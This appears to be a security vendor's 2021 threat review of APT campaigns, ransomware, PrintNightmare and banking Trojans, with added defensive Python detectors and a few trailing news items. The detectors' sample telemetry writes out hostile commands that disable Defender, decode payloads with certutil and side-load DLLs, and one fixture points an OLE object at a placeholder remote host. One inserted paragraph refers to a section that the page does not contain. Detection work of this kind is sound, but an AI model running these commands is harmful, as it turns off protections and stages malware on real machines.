On September 7, Microsoft reported a zero-day vulnerability (CVE-2021-40444) that could allow an attacker to execute code remotely on vulnerable computers. The vulnerability is in MSHTML, the Internet Explorer engine. Even though few people use IE nowadays, some programs use its engine to handle web content – in particular, Microsoft Office applications.

We have seen targeted attacks exploiting the vulnerability to target companies in research and development, the energy sector and other major industries, banking, the medical technology sector, as well as telecoms and IT.

To exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing a URL for a malicious script. If the victim opens the document, Microsoft Office downloads the script and runs it using the MSHTML engine. Then the script can use ActiveX controls to perform malicious actions on the victim’s computer.
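The paragraph above, like the exploit-statistics section earlier on this page, describes a document that carries a reference to remote content for the MSHTML engine to fetch rather than an object stored inside the file. A defender can check for that structurally: an OOXML document is a zip package, and every embedded object is declared in a `.rels` part; a legitimate embedded OLE object is an internal part of the package, so an `oleObject` relationship with `TargetMode="External"` is worth flagging regardless of what URL it points to. The following is an added example, not code from the report or from Microsoft, using only the Python standard library; the two sample documents are constructed in memory and the external URL is a placeholder.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_OBJECT_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                   "relationships/oleObject")
HYPERLINK_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                  "relationships/hyperlink")

# Minimal package skeleton for the constructed samples (not real documents).
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/></Types>'
)
DOCUMENT_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    '<w:body/></w:document>'
)
# Benign: the OLE object is an internal part; only a hyperlink points outside.
BENIGN_RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId1" Type="{OLE_OBJECT_TYPE}" Target="embeddings/oleObject1.bin"/>'
    f'<Relationship Id="rId2" Type="{HYPERLINK_TYPE}" Target="https://example.com/" TargetMode="External"/>'
    '</Relationships>'
)
# Suspicious: the OLE object itself is to be fetched from outside the package.
SUSPICIOUS_RELS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    f'<Relationships xmlns="{REL_NS}">'
    f'<Relationship Id="rId1" Type="{OLE_OBJECT_TYPE}" '
    'Target="http://example.invalid/PLACEHOLDER" TargetMode="External"/>'
    '</Relationships>'
)


def build_docx(rels_xml):
    """Construct a minimal .docx in memory with the given document.xml.rels."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml", CONTENT_TYPES)
        pkg.writestr("word/document.xml", DOCUMENT_XML)
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def external_relationships(docx_bytes):
    """Return every relationship in the package whose TargetMode is External,
    as dicts with the .rels part name, relationship type and target."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    found.append({"part": name,
                                  "type": rel.get("Type", ""),
                                  "target": rel.get("Target", "")})
    return found


def suspicious_ole_links(docx_bytes):
    """Targets of OLE objects that would be loaded from outside the package.
    Hyperlinks are legitimately external, so only oleObject relationships count."""
    return [r["target"] for r in external_relationships(docx_bytes)
            if r["type"] == OLE_OBJECT_TYPE]


if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("suspicious", SUSPICIOUS_RELS)):
        print(label, suspicious_ole_links(build_docx(rels)))
```

Run over a mail gateway's attachment queue, this check is cheap (no rendering, no macro analysis) and survives changes to the payload because it keys on the package structure rather than on a URL or hash; the price is that any external-target OLE relationship is reported, so the output is a triage signal rather than a verdict.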

Tomiris backdoor linked to SolarWinds attack

The SolarWinds incident last December stood out because of the extreme carefulness of the attackers and the high-profile nature of their victims. The evidence suggests that the threat actor behind the attack, DarkHalo (aka Nobelium), had spent six months inside OrionIT’s networks to perfect their attack. The following timeline sums up the different steps of the campaign.

In June, more than six months after DarkHalo had gone dark, we observed the DNS hijacking of multiple government zones of a CIS member state that allowed the attacker to redirect traffic from government mail servers to computers under their control – probably achieved by obtaining credentials to the control panel of the victims’ registrar. When victims tried to access their corporate mail, they were redirected to a fake copy of the web interface.

After this, they were tricked into downloading previously unknown malware. The backdoor, dubbed Tomiris, bears a number of similarities to the second-stage malware, Sunshuttle (aka GoldMax), used by DarkHalo last year. However, there are also a number of overlaps between Tomiris and Kazuar, a backdoor that has been linked to the Turla APT threat actor. None of the similarities is enough to link Tomiris and Sunshuttle with sufficient confidence. However, taken together they suggest the possibility of common authorship or shared development practices.

You can read our analysis here.

GhostEmperor

Earlier this year, while investigating the rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. We attribute the activity to a previously unknown threat actor that we have called GhostEmperor. This cluster stood out because it used a formerly unknown Windows kernel mode rootkit that we dubbed Demodex; and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers.

The rootkit is used to hide the user mode malware’s artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver Signature Enforcement mechanism.

We identified multiple attack vectors that triggered an infection chain leading to the execution of the malware in memory. The majority of GhostEmperor infections were deployed on public-facing servers, as many of the malicious artefacts were installed by the httpd.exe Apache server process, the w3wp.exe IIS Windows server process, or the oc4j.jar Oracle server process. This means that the attackers probably abused vulnerabilities in the web applications running on those systems, allowing them to drop and execute their files.

Although infections often start with a BAT file, in some cases the known infection chain was preceded by an earlier stage: a malicious DLL that was side-loaded by wdichost.exe, a legitimate Microsoft command line utility (originally called MpCmdRun.exe). The side-loaded DLL then proceeds to decode and load an additional executable called license.rtf. Unfortunately, we did not manage to retrieve this executable, but we saw that the consecutive actions of loading it included the creation and execution of GhostEmperor scripts by wdichost.exe.

This toolset was in use from as early as July 2020, mainly targeting Southeast Asian entities, including government agencies and telecoms companies.

FinSpy: analysis of current capabilities

At the end of September, at the Kaspersky Security Analyst Summit, our researchers provided an overview of FinSpy, an infamous surveillance toolset that several NGOs have repeatedly reported being used against journalists, political dissidents and human rights activists. Our analysis included not only the Windows version of FinSpy, but also Linux and macOS versions, which share the same internal structure and features.

After 2018, we observed falling detection rates for FinSpy for Windows. However, it never actually went away – it was simply using various first-stage implants to hide its activities. We started detecting some suspicious backdoored installer packages (including TeamViewer, VLC Media Player and WinRAR); then in the middle of 2019 we found a host that served these installers along with FinSpy Mobile implants for Android.

The authors have gone to great lengths to make FinSpy inaccessible to security researchers – it seems they have put as much work into anti-analysis and obfuscation as they have into the Trojan itself. First, the samples are protected with multiple layers of evasion tactics.

Moreover, once the Trojan has been installed, it is heavily camouflaged using four complex, custom-made obfuscators.

Apart from Trojanized installers, we also observed infections involving use of a UEFI (Unified Extensible Firmware Interface) and MBR (Master Boot Record) bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our private report on FinSpy.

The user of a smartphone or tablet can be infected through a link in a text message. In some cases (for example, if the victim's iPhone has not been jailbroken), the attacker may need physical access to the device.

Other malware

REvil attack on MSPs and their customers worldwide

An attack perpetrated by the REvil Ransomware-as-a-Service gang (aka Sodinokibi) targeting Managed Service Providers (MSPs) and their clients was discovered on July 2.

The attackers identified and exploited a zero-day vulnerability in the Kaseya Virtual System/Server Administrator (VSA) platform. The VSA software, used by Kaseya customers to remotely monitor and manage software and network infrastructure, is supplied either as a cloud service or via on-premises VSA servers.

The exploit involved deploying a malicious dropper via a PowerShell script. The script disabled Microsoft Defender features and then used the certutil.exe utility to decode a malicious executable (agent.exe) that dropped an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library was then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique.
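The chain in the paragraph above and the GhostEmperor side-loading described earlier are built from the same living-off-the-land steps: a web-server worker or management agent spawning a shell, Defender features switched off, certutil.exe decoding a payload, and a legitimate Defender binary (MsMpEng.exe, or MpCmdRun.exe renamed to wdichost.exe) executed from a directory where it does not belong so that it side-loads an attacker's DLL. The following is an added example, not Kaspersky's code or code from this page: it runs those four rules over constructed process-creation records (fields modelled on Sysmon Event ID 1 / EDR telemetry). The sample paths, the assumed Defender install directories and the rule names are this example's own assumptions.

```python
"""Detection rules for the living-off-the-land chain described above.

Added example, not Kaspersky's code or code from this page. Evaluates
constructed process-creation records (image path, PE OriginalFileName,
command line, parent image) against the steps seen in the Kaseya/REvil and
GhostEmperor intrusions. Sample paths are made up.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    image: str           # full path of the newly created process
    original_name: str   # PE header OriginalFileName, "" if the sensor lacks it
    command_line: str
    parent_image: str


# Defender binaries abused as side-loading hosts on this page and the
# directories they legitimately run from (assumption: build this list from
# your own inventory; the Platform directory carries a version subfolder).
DEFENDER_BINARIES = {"msmpeng.exe", "mpcmdrun.exe"}
DEFENDER_DIRS = (
    "c:\\program files\\windows defender\\",
    "c:\\programdata\\microsoft\\windows defender\\platform\\",
)
WEB_SERVER_PARENTS = {"httpd.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

CERTUTIL_ABUSE = re.compile(r"-(decode|urlcache)\b")
DEFENDER_OFF = re.compile(r"-disable\w+\s+(\$true|1)\b")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(ev: ProcEvent) -> List[str]:
    """Return the names of the rules that fire for one process-creation event."""
    img, parent = _basename(ev.image), _basename(ev.parent_image)
    cmd, orig = ev.command_line.lower(), ev.original_name.lower()
    hits = []
    if parent in WEB_SERVER_PARENTS and img in SHELLS:
        hits.append("web-server-spawned-shell")
    if img in SHELLS and "set-mppreference" in cmd and DEFENDER_OFF.search(cmd):
        hits.append("defender-feature-disabled")
    if img == "certutil.exe" and CERTUTIL_ABUSE.search(cmd):
        hits.append("certutil-decode-or-download")
    # OriginalFileName survives renaming (wdichost.exe is really MpCmdRun.exe),
    # so match on it rather than on the on-disk file name.
    if orig in DEFENDER_BINARIES and not ev.image.lower().startswith(DEFENDER_DIRS):
        hits.append("defender-binary-outside-install-dir")
    return hits


def scan(events) -> List[Tuple[str, str]]:
    """(image, rule) pairs for every rule that fires across a batch of events."""
    return [(ev.image, rule) for ev in events for rule in detect(ev)]


# Constructed sample telemetry (not real incident data).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", "Cmd.Exe",
              "cmd.exe /c whoami", r"C:\Windows\System32\inetsrv\w3wp.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
              'powershell.exe -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true '
              '-DisableIOAVProtection $true"', r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
              r"certutil.exe -decode C:\Temp\agent.crt C:\Temp\agent.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(r"C:\Temp\MsMpEng.exe", "MsMpEng.exe",
              r"C:\Temp\MsMpEng.exe", r"C:\Temp\agent.exe"),
    ProcEvent(r"C:\ProgramData\wdichost.exe", "MpCmdRun.exe",
              "wdichost.exe", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Program Files\Windows Defender\MsMpEng.exe", "MsMpEng.exe",
              r"C:\Program Files\Windows Defender\MsMpEng.exe",
              r"C:\Windows\System32\services.exe"),  # benign: real install path
]

if __name__ == "__main__":
    for image, rule in scan(SAMPLE_EVENTS):
        print(f"{rule:40} {image}")
```

The last rule is the one worth copying into a real detection: matching on OriginalFileName plus an install-path allow-list catches both the relocated MsMpEng.exe of the Kaseya chain and the renamed MpCmdRun.exe of GhostEmperor, whereas a rule keyed on the on-disk name would miss the rename.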

The attack is estimated to have resulted in the encryption of files belonging to around 60 Kaseya customers using the on-premises version of the platform. Many of them were MSPs who use VSA to manage the networks of other businesses. This MSP connection gave REvil access to those businesses, and Kaseya estimated that around 1,500 downstream businesses were affected.

Using our Threat Intelligence service, we observed more than 5,000 attack attempts in 22 countries by the time our analysis of the attack was published.

What a [Print]Nightmare

Early in July, Microsoft published an alert about vulnerabilities in the Windows Print Spooler service. The vulnerabilities, CVE-2021-1675 and CVE-2021-34527 (aka PrintNightmare), can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service. This service is enabled by default on all Windows clients and servers, including domain controllers, making both vulnerabilities potentially very dangerous.

Moreover, owing to a misunderstanding between teams of researchers, a proof-of-concept (PoC) exploit for PrintNightmare was published online. The researchers involved believed that Microsoft’s Patch Tuesday release in June had already solved the problem, so they shared their work with the expert community. However, while Microsoft had published a patch for CVE-2021-1675, the PrintNightmare vulnerability remained unpatched until July. The PoC was quickly removed, but not before it had been copied multiple times.

CVE-2021-1675 is a privilege elevation vulnerability, allowing an attacker with low access privileges to craft and use a malicious DLL file to run an exploit and gain higher privileges. However, that is only possible if the attacker already has direct access to the vulnerable computer in question.

CVE-2021-34527 is significantly more dangerous because it is a remote code execution (RCE) vulnerability: a user with an ordinary domain account can make the Print Spooler on a remote machine load an attacker-supplied DLL, so no prior access to that machine is needed.

You can find a more detailed technical description of both vulnerabilities here.
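Because the spooler is on by default everywhere, including domain controllers, the practical question after reading the above is which hosts still expose it. The following is an added example, not code from the page or from Kaspersky: it applies the checks from Microsoft's published hardening guidance for PrintNightmare (the Point and Print values under the Printers policy key, the "Allow Print Spooler to accept client connections" policy, and disabling the service where it is not needed) to a snapshot of one host. On Windows, collect_snapshot() reads the live values with winreg; the snapshot layout, the finding identifiers and the constructed sample snapshots are this example's own assumptions.

```python
"""Print Spooler posture check for the PrintNightmare hardening.

Added example, not code from the page or from Kaspersky. Registry names and
recommended values follow Microsoft's published guidance; the snapshot
layout and the sample snapshots are assumptions of this example.
"""
from typing import Dict, List, Optional, Tuple

POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\Printers"
POINT_AND_PRINT_KEY = POLICY_KEY + r"\PointAndPrint"
SPOOLER_SERVICE_KEY = r"SYSTEM\CurrentControlSet\Services\Spooler"
SERVICE_DISABLED = 4  # value of the service 'Start' DWORD when disabled


def assess(snap: Dict) -> List[Tuple[str, str]]:
    """Return (finding-id, remediation) pairs for one host snapshot."""
    findings = []
    pnp = snap.get("point_and_print", {})
    spooler_enabled = snap.get("spooler_start", 2) != SERVICE_DISABLED

    if spooler_enabled and snap.get("domain_controller"):
        findings.append(("spooler-on-dc",
            "Disable the Print Spooler on domain controllers: "
            "Stop-Service Spooler -Force; Set-Service Spooler -StartupType Disabled"))
    elif spooler_enabled and not snap.get("print_server") \
            and snap.get("remote_rpc_endpoint", 1) != 2:
        findings.append(("spooler-accepts-remote-clients",
            "Not a print server: set 'Allow Print Spooler to accept client connections' "
            "to Disabled (RegisterSpoolerRemoteRpcEndPoint = 2) so the RPC path used by "
            "CVE-2021-34527 is not reachable"))
    # Microsoft: either of these set to 1 makes the host vulnerable by design,
    # even with the July 2021 update installed.
    for name in ("NoWarningNoElevationOnInstall", "UpdatePromptSettings"):
        if pnp.get(name, 0) == 1:
            findings.append((f"pointandprint-{name.lower()}",
                             f"Set {name} to 0 under {POINT_AND_PRINT_KEY}"))
    # Default became 1 with the August 2021 update; 0 lets standard users install drivers.
    if pnp.get("RestrictDriverInstallationToAdministrators", 1) == 0:
        findings.append(("driver-install-not-restricted",
            f"Set RestrictDriverInstallationToAdministrators to 1 under {POINT_AND_PRINT_KEY}"))
    return findings


def collect_snapshot() -> Optional[Dict]:
    """Read the live values on Windows; returns None on other platforms."""
    try:
        import winreg
    except ImportError:
        return None

    def value(key: str, name: str):
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as k:
                return winreg.QueryValueEx(k, name)[0]
        except OSError:  # key or value absent: policy not configured
            return None

    pnp_names = ("NoWarningNoElevationOnInstall", "UpdatePromptSettings",
                 "RestrictDriverInstallationToAdministrators")
    pnp = {n: value(POINT_AND_PRINT_KEY, n) for n in pnp_names}
    rpc = value(POLICY_KEY, "RegisterSpoolerRemoteRpcEndPoint")
    product = value(r"SYSTEM\CurrentControlSet\Control\ProductOptions", "ProductType")
    return {
        "spooler_start": value(SPOOLER_SERVICE_KEY, "Start"),
        "domain_controller": product == "LanmanNT",
        "print_server": False,  # assumption: tag real print servers from inventory
        "remote_rpc_endpoint": 1 if rpc is None else rpc,  # unset policy = accepts clients
        "point_and_print": {n: v for n, v in pnp.items() if v is not None},
    }


# Constructed sample snapshots (not real hosts).
SAMPLE_DC = {"spooler_start": 2, "domain_controller": True, "point_and_print": {}}
SAMPLE_HARDENED_WORKSTATION = {
    "spooler_start": 2, "domain_controller": False, "remote_rpc_endpoint": 2,
    "point_and_print": {"NoWarningNoElevationOnInstall": 0, "UpdatePromptSettings": 0,
                        "RestrictDriverInstallationToAdministrators": 1}}
SAMPLE_WEAKENED = {
    "spooler_start": 2, "domain_controller": False, "remote_rpc_endpoint": 1,
    "point_and_print": {"NoWarningNoElevationOnInstall": 1,
                        "RestrictDriverInstallationToAdministrators": 0}}

if __name__ == "__main__":
    for fid, fix in assess(collect_snapshot() or SAMPLE_WEAKENED):
        print(f"[{fid}] {fix}")
```

Note the asymmetry in the defaults: an absent RegisterSpoolerRemoteRpcEndPoint means the spooler accepts remote clients, while an absent RestrictDriverInstallationToAdministrators means the hardened default applies on updated hosts, so an unpatched host should be treated as vulnerable regardless of what this check reports.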

Grandoreiro and Melcoz arrests

In July, the Spanish Ministry of the Interior announced the arrest of 16 people connected to the Grandoreiro and Melcoz (aka Mekotio) cybercrime groups. Both groups are originally from Brazil and form part of the Tetrade umbrella, operating for a few years now in Latin America and Western Europe.

The Grandoreiro banking Trojan family started its operations in Brazil, then expanded to other Latin American countries and later to Western Europe. The group regularly improves its techniques and, based on our analysis of its campaigns, operates as a malware-as-a-service (MaaS) project. Our telemetry shows that, since January 2020, Grandoreiro has mainly attacked victims in Brazil, Mexico, Spain, Portugal and Turkey.

Melcoz had been active in Brazil since at least 2018 before expanding overseas. We observed the group attacking assets in Chile in 2018 and, more recently, in Mexico; it is likely that there are victims in other countries too, as some of the targeted banks have international operations. As a rule, the malware uses AutoIt or VBS scripts embedded in MSI files, which run malicious DLLs through DLL hijacking in order to bypass security solutions. The malware steals passwords from browsers and from the device's memory and provides the operators with remote access, which they use to take over the victim's internet banking session. It also includes a Bitcoin wallet stealing module. Our telemetry confirms that, since January 2020, Melcoz has been actively targeting Brazil, Chile and Spain, among other countries.

Since both malware families are from Brazil, the individuals arrested in Spain are just operators. So, it’s likely that the creators of Grandoreiro and Melcoz will continue to develop new malware techniques and recruit new members in their countries of interest.

Gamers beware

Earlier this year, we discovered an ad in an underground forum for a piece of malware dubbed BloodyStealer by its creators. The malware is designed to steal passwords, cookies, bank card details, browser auto-fill data, device information, screenshots, desktop and uTorrent client files, and Bethesda, Epic Games, GOG, Origin, Steam, Telegram and VimeWorld client sessions and logs.

The BloodyStealer ad (Source: https://twitter.com/3xp0rtblog)

The authors of the malware, which has hit users in Europe, Latin America and the Asia-Pacific region, have adopted a MaaS distribution model, meaning that anyone can buy it for the modest price of around $10 per month (roughly $40 for a “lifetime license”).

On top of its theft functions, the malware includes tools to thwart analysis. It sends stolen information as a ZIP archive to the C2 (command-and-control) server, which is protected against DDoS (distributed denial of service) attacks. The cybercriminals use either the (quite basic) control panel or Telegram to obtain the data, including gamer accounts.

BloodyStealer is just one of many tools available on the dark web for stealing gamer accounts. Moreover, underground forums often feature ads offering to post a malicious link on a popular website or selling tools to generate phishing pages automatically. Using these tools, cybercriminals can collect, and then try to monetize, a huge amount of credentials. All kinds of offers related to gamer accounts can be found on the dark web.

So-called logs are among the most popular. These are databases containing reams of data for logging into accounts. In their ads, attackers can specify the types of data, the geography of users, the period over which the logs were collected and other details. For example, in the screenshot below, an underground forum member offers an archive with 65,600 records, of which 9,000 are linked to users from the US, and 5,000 to residents of India, Turkey and Canada. The entire archive costs $150 (that’s about 0.2 cents per record).

Cybercriminals can also use compromised gaming accounts to launder money, distribute phishing links and conduct other illegal business.

You can read more about gaming threats, including BloodyStealer, here and here.

Triada Trojan in WhatsApp mod

Not everyone is happy with the official WhatsApp app, turning instead to modified WhatsApp clients for features that the WhatsApp developers haven’t yet implemented in the official version. The creators of these mods often embed ads in them. However, their use of third-party ad modules can provide a mechanism for malicious code to be slipped into the app unnoticed.

This happened recently with FMWhatsApp, a popular WhatsApp mod. In version 16.80.0 the developers used a third-party ad module that includes the Triada Trojan (detected by Kaspersky’s mobile antivirus as Trojan.AndroidOS.Triada.ef). This Trojan performs an intermediary function. First, it collects data about the user’s device, and then, depending on the information, it downloads one of several other Trojans. You can find a description of the functions that these other Trojans perform in our analysis of the infected FMWhatsApp mod.

Qakbot banking Trojan

QakBot (aka QBot, QuackBot and Pinkslipbot) is a banking Trojan that was first discovered in 2007 and has been continually maintained and developed since then. It is now one of the leading banking Trojans around the globe. Its main purpose is to steal banking credentials (logins, passwords and the like), but it has also acquired functionality allowing it to spy on financial operations, spread itself and install ransomware in order to maximize revenue from compromised organizations.

The Trojan also includes the ability to log keystrokes, backdoor functionality, and techniques to evade detection. The latter includes virtual environment detection, regular self-updates and cryptor/packer changes. QakBot also tries to protect itself from being analyzed and debugged by experts and automated tools. Another interesting piece of functionality is the ability to steal emails: these are later used by the attackers to send targeted emails to the victims, with the information obtained used to lure victims into opening those emails.

QakBot is known to infect its victims mainly via spam campaigns. In some cases, the emails are delivered with Microsoft Office documents or password-protected archives with documents attached. The documents contain macros and victims are prompted to open the attachments with claims that they contain important information (e.g., an invoice). In some cases, the emails contain links to web pages distributing malicious documents.
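The lure described above rests on two file-format facts a mail gateway can act on: a modern Office document is a ZIP container, so a VBA project is visible as a vbaProject.bin part without opening the file in Office, and a password-protected archive cannot be opened by the scanner at all, which is exactly why the operators use one. The following is an added example, not code from the page or from Kaspersky, that triages an attachment on those two facts; the sample documents are constructed in memory (the vbaProject.bin is placeholder bytes, not real VBA) and mark_encrypted() is a test fixture that only sets the encryption flag, since Python's zipfile cannot write password-protected archives.

```python
"""Attachment triage for the QakBot lure described above.

Added example, not code from the page or from Kaspersky. Inspects an
attachment for an OOXML VBA project, recurses into ZIP archives and reports
password-protected entries instead of silently skipping them. Sample files
are constructed; no real malware is involved.
"""
import io
import zipfile
from typing import Dict, List

MACRO_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")
OOXML_EXT = (".docx", ".docm", ".dotm", ".xlsx", ".xlsm", ".xltm", ".pptx", ".pptm")
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .doc/.xls compound file
MAX_DEPTH = 2


def inspect_ooxml(data: bytes) -> List[str]:
    """Names of the VBA project parts present in an OOXML container."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
    return [p for p in MACRO_PARTS if p in names]


def triage(filename: str, data: bytes, depth: int = 0) -> List[str]:
    """Human-readable findings for one attachment; recurses into ZIP archives."""
    name = filename.lower()
    if data.startswith(OLE_MAGIC):
        return [f"{filename}: legacy binary Office file; needs an OLE parser "
                f"(e.g. oletools) for macro inspection"]
    if name.endswith(OOXML_EXT):
        if not zipfile.is_zipfile(io.BytesIO(data)):
            return [f"{filename}: claims to be OOXML but is not a ZIP container; sandbox it"]
        parts = inspect_ooxml(data)
        return [f"{filename}: VBA project present ({', '.join(parts)}); macro lure"] if parts else []
    if name.endswith(".zip") and zipfile.is_zipfile(io.BytesIO(data)):
        findings = []
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for zi in z.infolist():
                if zi.flag_bits & 0x1:  # general-purpose bit 0: entry is encrypted
                    findings.append(f"{filename}: entry {zi.filename} is password-protected; "
                                    f"contents cannot be scanned, treat as suspicious")
                elif depth < MAX_DEPTH:
                    findings.extend(triage(zi.filename, z.read(zi), depth + 1))
        return findings
    return []


# --- constructed fixtures -------------------------------------------------

def make_ooxml(with_vba: bool) -> bytes:
    """Minimal Word-like container; not a document Word would open."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            z.writestr("word/vbaProject.bin", b"\x00" * 64)  # placeholder, not real VBA
    return buf.getvalue()


def make_archive(entries: Dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for n, d in entries.items():
            z.writestr(n, d)
    return buf.getvalue()


def mark_encrypted(zip_bytes: bytes) -> bytes:
    """Fixture only: set the 'encrypted' flag in every local and central-directory
    header. The data is NOT encrypted, but readers honour the flag."""
    b = bytearray(zip_bytes)
    for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = b.find(sig)
        while pos >= 0:
            b[pos + off] |= 0x01
            pos = b.find(sig, pos + 4)
    return bytes(b)


if __name__ == "__main__":
    samples = {
        "invoice.docm": make_ooxml(True),
        "report.docx": make_ooxml(False),
        "docs.zip": make_archive({"invoice.docm": make_ooxml(True)}),
        "locked.zip": mark_encrypted(make_archive({"invoice.docm": b"not scanned"})),
    }
    for fname, blob in samples.items():
        print(fname, triage(fname, blob) or ["clean"])
```

The extension list is deliberately not the deciding factor: a .docx with a vbaProject.bin part is still flagged, and a legacy binary .doc (the other common QakBot carrier) is routed to an OLE-aware parser rather than passed as clean.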

However, there is another infection vector that involves a malicious QakBot payload being transferred to the victim’s machine via other malware on the compromised machine. The initial infection vectors may vary depending on what the threat actors believe has the best chance of success for the targeted organization(s). It’s known that various threat actors perform reconnaissance of target organizations beforehand to decide which infection vector is most suitable.

We analyzed statistics on QakBot attacks collected from our Kaspersky Security Network (KSN), where anonymized data voluntarily provided by Kaspersky users is accumulated and processed. In the first seven months of 2021 our products detected 181,869 attempts to download or run QakBot. This number is lower than the detection number from January to July 2020, though the number of users affected grew by 65% – from 10,493 in the previous year to 17,316 this year.

Number of users affected by QakBot attacks from January to July in 2020 and 2021

You can read our full analysis here.

Imunify360 Bug Leaves Linux Web Servers Open to Code Execution, Takeover

LinuxSecurity.com - 26 November 2021 - 13:00
CloudLinux's security platform for Linux-based websites and web servers contains a high-severity PHP deserialization bug, leaving web servers vulnerable to code execution and takeover.
Category: Hacking & Security

Crypto Hackers Using Babadeda Crypter to Make Their Malware Undetectable

The Hacker News - 26 November 2021 - 11:32
A new malware campaign has been discovered targeting cryptocurrency, non-fungible token (NFT), and DeFi aficionados through Discord channels to deploy a crypter named "Babadeda" that's capable of bypassing antivirus solutions and staging a variety of attacks. "[T]his malware installer has been used in a variety of recent campaigns to deliver information stealers, RATs, and even LockBit ransomware,
Category: Hacking & Security